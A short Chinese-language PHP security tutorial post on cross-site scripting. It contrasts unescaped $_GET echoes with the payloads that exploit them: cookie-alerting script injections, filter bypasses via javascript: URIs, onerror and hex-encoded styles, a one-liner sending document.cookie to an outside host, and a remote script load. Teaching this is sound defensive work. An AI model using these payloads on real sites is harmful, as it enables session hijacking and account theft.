PHP安全新闻早8点_1112
// 2011-11-12 星期六 // 程序员的思维: // index.php ---代码片段 <?php $Micropoor = $_GET['Micropoor']; print $Micropoor; ?> //我们的思维: index.php?Micropoor=<script>alert(document.cookie)</script> ############################################################ // 程序员的思维: // index.php ---代码片段 <html> <body> //...略 <input name="Micropoor" value="<?php echo $_GET['Micropoor']; ?>" > //...略 </body> </html> //我们的思维: [url]http://127.0.0.1:81/index.php?Micropoor=[/url]"><script>alert(document.cookie);</script> ############################################################### // 程序员的思维: 程序员过滤了<script></script>标签,那么在页面上就不会执行这段js代码 //我们的思维: <img src='http://hi.baidu.com/micropoor/Micropoor.jpg'>img的src标签是指向一个web服务器的图片URL 但是也可以替换为:<img src='javascript:alert("Micropoor")'> 其他:进制转换,加入混淆字符,加密等。 ############################################################# //突破长短: 下面的 28 字节命令将把用户的cookie传送至主机名为micropoor:的服务器。 open("//micropoor/"+document.cookie) 如果直接注入 HTML 么下面这个30字节的标签将从主机名为micropoor:的服务器加载并执行一段脚本。 <script src=http://micropoor></script>
知识拓展:
1,直接使用JS脚本。
<img src="javascript:alert('Micropoor')" />
2,对JS脚本进行转码。
<img src="javascript:alert('Micropoor')" />
3,利用标签的触发条件插入代码并进行转码。
<img onerror="alert('Micropoor')" />
4,使用16进制来写
<img STYLE="background-image: \75\72\6c\28\6a\61\76\61\73\63\72\69\70\74\3a\61\6c\65\72\74\28\27\58\53\53\27\29\29">
两种类型
存储型XSS
反射型XSS
新闻就是新闻,不做深究。功底也无法深究。
结论:一切的输入都是有害的。